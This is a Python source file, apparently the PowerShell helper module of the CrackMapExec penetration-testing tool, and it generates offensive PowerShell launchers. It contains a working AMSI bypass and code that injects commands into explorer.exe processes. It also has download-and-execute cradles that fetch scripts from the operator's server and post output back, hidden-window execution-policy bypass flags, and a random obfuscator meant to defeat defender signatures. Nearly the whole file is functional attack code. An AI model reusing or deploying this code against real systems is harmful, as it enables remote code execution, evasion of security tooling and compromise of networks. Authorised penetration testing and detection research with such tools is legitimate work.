import cme import os import logging import re import tempfile from sys import exit from string import ascii_lowercase from random import choice, randrange, sample from subprocess import check_output, call from cme.helpers.misc import gen_random_string, which from cme.logger import CMEAdapter from base64 import b64encode logger = CMEAdapter() obfuscate_ps_scripts = False def get_ps_script(path): return os.path.join(os.path.dirname(cme.__file__), 'data', path) def encode_ps_command(command): return b64encode(command.encode('UTF-16LE')).decode() def is_powershell_installed(): if which('powershell'): return True return False def obfs_ps_script(path_to_script): ps_script = path_to_script.split('/')[-1] obfs_script_dir = os.path.join(os.path.expanduser('~/.cme'), 'obfuscated_scripts') obfs_ps_script = os.path.join(obfs_script_dir, ps_script) if is_powershell_installed() and obfuscate_ps_scripts: if os.path.exists(obfs_ps_script):'Using cached obfuscated Powershell script') with open(obfs_ps_script, 'r') as script: return'Performing one-time script obfuscation, go look at some memes cause this can take a bit...') invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "TOKEN,ALL,1,OUT {}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'), get_ps_script(path_to_script), obfs_ps_script) logging.debug(invoke_obfs_command) with open(os.devnull, 'w') as devnull: return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True) logger.success('Script obfuscated successfully') with open(obfs_ps_script, 'r') as script: return else: with open(get_ps_script(path_to_script), 'r') as script: """ Strip block comments, line comments, empty lines, verbose statements, and debug statements from a PowerShell source file. """ # strip block comments strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', # strip blank lines, lines starting with #, and verbose/debug statements strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")) )]) return strippedCode def create_ps_command(ps_command, force_ps32=False, dont_obfs=False, custom_amsi=None): if custom_amsi: with open(custom_amsi) as file_in: lines = [] for line in file_in: lines.append(line) amsi_bypass = ''.join(lines) else: amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} """ if force_ps32: command = amsi_bypass + """ $functions = {{ function Command-ToExecute {{ {command} }} }} if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {{ $job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32 $job | Wait-Job }} else {{ IEX "$functions" Command-ToExecute }} """.format(command=amsi_bypass + ps_command) else: command = amsi_bypass + ps_command logging.debug('Generated PS command:\n {}\n'.format(command)) # We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed concurrently # it would spawn a local powershell process per host which isn't ideal, until I figure out a good way of dealing with this # it will use the partial python implementation that I stole from GreatSCT ( <3 """ if is_powershell_installed(): temp = tempfile.NamedTemporaryFile(prefix='cme_', suffix='.ps1', dir='/tmp') temp.write(command) encoding_types = [1,2,3,4,5,6] while True: encoding = random.choice(encoding_types) invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),, encoding) logging.debug(invoke_obfs_command) out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip() command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out) logging.debug('Command length: {}'.format(len(command))) if len(command) <= 8192: temp.close() break encoding_types.remove(encoding) else: """ if not dont_obfs: obfs_attempts = 0 while True: command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "' + invoke_obfuscation(command) + '"' if len(command) <= 8191: break if obfs_attempts == 4: logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command))) exit(1) obfs_attempts += 1 else: command = 'powershell.exe -noni -nop -w 1 -enc {}'.format(encode_ps_command(command)) if len(command) > 8191: logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command))) exit(1) return command def gen_ps_inject(command, context=None, procname='explorer.exe', inject_once=False): #The following code gives us some control over where and how Invoke-PSInject does its thang #It prioritizes injecting into a process of the active console session ps_code = ''' $injected = $False $inject_once = {inject_once} $command = "{command}" $owners = @{{}} $console_login = gwmi win32_computersystem | select -exp Username gwmi win32_process | where {{$_.Name.ToLower() -eq '{procname}'.ToLower()}} | % {{ if ($_.getowner().domain -and $_.getowner().user){{ $owners[$_.getowner().domain + "\\" + $_.getowner().user] = $_.handle }} }} try {{ if ($owners.ContainsKey($console_login)){{ Invoke-PSInject -ProcId $owners.Get_Item($console_login) -PoshCode $command $injected = $True $owners.Remove($console_login) }} }} catch {{}} if (($injected -eq $False) -or ($inject_once -eq $False)){{ foreach ($owner in $owners.Values) {{ try {{ Invoke-PSInject -ProcId $owner -PoshCode $command }} catch {{}} }} }} '''.format(inject_once='$True' if inject_once else '$False', command=encode_ps_command(command), procname=procname) if context: return gen_ps_iex_cradle(context, 'Invoke-PSInject.ps1', ps_code, post_back=False) return ps_code def gen_ps_iex_cradle(context, scripts, command=str(), post_back=True): if type(scripts) is str: launcher = """ [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}} [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12' IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{ps_script_name}') {command} """.format(server=context.server, port=context.server_port, addr=context.localip, ps_script_name=scripts, command=command if post_back is False else '').strip() elif type(scripts) is list: launcher = '[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n' launcher +="[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'" for script in scripts: launcher += "IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{script}')\n".format(server=context.server, port=context.server_port, addr=context.localip, script=script) launcher.strip() launcher += command if post_back is False else '' if post_back is True: launcher += ''' $cmd = {command} $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse()'''.format(server=context.server, port=context.server_port, addr=context.localip, command=command) #second_cmd= second_cmd if second_cmd else '') logging.debug('Generated PS IEX Launcher:\n {}\n'.format(launcher)) return launcher.strip() # Following was stolen from def invoke_obfuscation(scriptString): # Add letters a-z with random case to $RandomDelimiters. alphabet = ''.join(choice([i.upper(), i]) for i in ascii_lowercase) # Create list of random dxelimiters called randomDelimiters. # Avoid using . * ' " [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. randomDelimiters = ['_','-',',','{','}','~','!','@','%','&','<','>',';',':'] for i in alphabet: randomDelimiters.append(i) # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. randomDelimiters = [choice(randomDelimiters) for _ in range(int(len(randomDelimiters)/4))] # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. delimitedEncodedArray = '' for char in scriptString: delimitedEncodedArray += str(ord(char)) + choice(randomDelimiters) # Remove trailing delimiter from $DelimitedEncodedArray. delimitedEncodedArray = delimitedEncodedArray[:-1] # Create printable version of $RandomDelimiters in random order to be used by final command. test = sample(randomDelimiters, len(randomDelimiters)) randomDelimitersToPrint = ''.join(i for i in test) # Generate random case versions for necessary operations. forEachObject = choice(['ForEach','ForEach-Object','%']) strJoin = ''.join(choice([i.upper(), i.lower()]) for i in '[String]::Join') strStr = ''.join(choice([i.upper(), i.lower()]) for i in '[String]') join = ''.join(choice([i.upper(), i.lower()]) for i in '-Join') charStr = ''.join(choice([i.upper(), i.lower()]) for i in 'Char') integer = ''.join(choice([i.upper(), i.lower()]) for i in 'Int') forEachObject = ''.join(choice([i.upper(), i.lower()]) for i in forEachObject) # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. randomDelimitersToPrintForDashSplit = '' for delim in randomDelimiters: # Random case 'split' string. split = ''.join(choice([i.upper(), i.lower()]) for i in 'Split') randomDelimitersToPrintForDashSplit += '-' + split + choice(['', ' ']) + '\'' + delim + '\'' + choice(['', ' ']) randomDelimitersToPrintForDashSplit = randomDelimitersToPrintForDashSplit.strip('\t\n\r') # Randomly select between various conversion syntax options. randomConversionSyntax = [] randomConversionSyntax.append('[' + charStr + ']' + choice(['', ' ']) + '[' + integer + ']' + choice(['', ' ']) + '$_') randomConversionSyntax.append('[' + integer + ']' + choice(['', ' ']) + '$_' + choice(['', ' ']) + choice(['-as', '-As', '-aS', '-AS']) + choice(['', ' ']) + '[' + charStr + ']') randomConversionSyntax = choice(randomConversionSyntax) # Create array syntax for encoded scriptString as alternative to .Split/-Split syntax. encodedArray = '' for char in scriptString: encodedArray += str(ord(char)) + choice(['', ' ']) + ',' + choice(['', ' ']) # Remove trailing comma from encodedArray encodedArray = '(' + choice(['', ' ']) + encodedArray.rstrip().rstrip(',') + ')' # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: setOfsVarSyntax = [] setOfsVarSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "''") setOfsVarSyntax.append(choice(['Set-Variable', 'SV', 'SET']) + choice([' '*1, ' '*2]) + "'OFS'" + choice([' '*1, ' '*2]) + "''") setOfsVar = choice(setOfsVarSyntax) setOfsVarBackSyntax = [] setOfsVarBackSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "' '") setOfsVarBackSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "' '") setOfsVarBack = choice(setOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. setOfsVar = ''.join(choice([i.upper(), i.lower()]) for i in setOfsVar) setOfsVarBack = ''.join(choice([i.upper(), i.lower()]) for i in setOfsVarBack) # Generate the code that will decrypt and execute the payload and randomly select one. baseScriptArray = [] baseScriptArray.append('[' + charStr + '[]' + ']' + choice(['', ' ']) + encodedArray) baseScriptArray.append('(' + choice(['', ' ']) + "'" + delimitedEncodedArray + "'." + split + "(" + choice(['', ' ']) + "'" + randomDelimitersToPrint + "'" + choice(['', ' ']) + ')' + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')') baseScriptArray.append('(' + choice(['', ' ']) + "'" + delimitedEncodedArray + "'" + choice(['', ' ']) + randomDelimitersToPrintForDashSplit + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')') baseScriptArray.append('(' + choice(['', ' ']) + encodedArray + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')') # Generate random JOIN syntax for all above options newScriptArray = [] newScriptArray.append(choice(baseScriptArray) + choice(['', ' ']) + join + choice(['', ' ']) + "''") newScriptArray.append(join + choice(['', ' ']) + choice(baseScriptArray)) newScriptArray.append(strJoin + '(' + choice(['', ' ']) + "''" + choice(['', ' ']) + ',' + choice(['', ' ']) + choice(baseScriptArray) + choice(['', ' ']) + ')') newScriptArray.append('"' + choice(['', ' ']) + '$(' + choice(['', ' ']) + setOfsVar + choice(['', ' ']) + ')' + choice(['', ' ']) + '"' + choice(['', ' ']) + '+' + choice(['', ' ']) + strStr + choice(baseScriptArray) + choice(['', ' ']) + '+' + '"' + choice(['', ' ']) + '$(' + choice(['', ' ']) + setOfsVarBack + choice(['', ' ']) + ')' + choice(['', ' ']) + '"') # Randomly select one of the above commands. newScript = choice(newScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. invokeExpressionSyntax = [] invokeExpressionSyntax.append(choice(['IEX', 'Invoke-Expression'])) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. invocationOperator = choice(['.','&']) + choice(['', ' ']) invokeExpressionSyntax.append(invocationOperator + "( $ShellId[1]+$ShellId[13]+'x')") invokeExpressionSyntax.append(invocationOperator + "( $PSHome[" + choice(['4', '21']) + "]+$PSHOME[" + choice(['30', '34']) + "]+'x')") invokeExpressionSyntax.append(invocationOperator + "( $env:Public[13]+$env:Public[5]+'x')") invokeExpressionSyntax.append(invocationOperator + "( $env:ComSpec[4," + choice(['15', '24', '26']) + ",25]-Join'')") invokeExpressionSyntax.append(invocationOperator + "((" + choice(['Get-Variable','GV','Variable']) + " '*mdr*').Name[3,11,2]-Join'')") invokeExpressionSyntax.append(invocationOperator + "( " + choice(['$VerbosePreference.ToString()','([String]$VerbosePreference)']) + "[1,3]+'x'-Join'')") # Randomly choose from above invoke operation syntaxes. invokeExpression = choice(invokeExpressionSyntax) # Randomize the case of selected invoke operation. invokeExpression = ''.join(choice([i.upper(), i.lower()]) for i in invokeExpression) # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) invokeOptions = [] invokeOptions.append(choice(['', ' ']) + invokeExpression + choice(['', ' ']) + '(' + choice(['', ' ']) + newScript + choice(['', ' ']) + ')' + choice(['', ' '])) invokeOptions.append(choice(['', ' ']) + newScript + choice(['', ' ']) + '|' + choice(['', ' ']) + invokeExpression) obfuscatedPayload = choice(invokeOptions) """ # Array to store all selected PowerShell execution flags. powerShellFlags = [] noProfile = '-nop' nonInteractive = '-noni' windowStyle = '-w' # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. commandlineOptions = [] commandlineOptions.append(noProfile[0:randrange(4, len(noProfile) + 1, 1)]) commandlineOptions.append(nonInteractive[0:randrange(5, len(nonInteractive) + 1, 1)]) # Randomly decide to write WindowStyle value with flag substring or integer value. commandlineOptions.append(''.join(windowStyle[0:randrange(2, len(windowStyle) + 1, 1)] + choice([' '*1, ' '*2, ' '*3]) + choice(['1','h','hi','hid','hidd','hidde']))) # Randomize the case of all command-line arguments. for count, option in enumerate(commandlineOptions): commandlineOptions[count] = ''.join(choice([i.upper(), i.lower()]) for i in option) for count, option in enumerate(commandlineOptions): commandlineOptions[count] = ''.join(option) commandlineOptions = sample(commandlineOptions, len(commandlineOptions)) commandlineOptions = ''.join(i + choice([' '*1, ' '*2, ' '*3]) for i in commandlineOptions) obfuscatedPayload = 'powershell.exe ' + commandlineOptions + newScript """ return obfuscatedPayload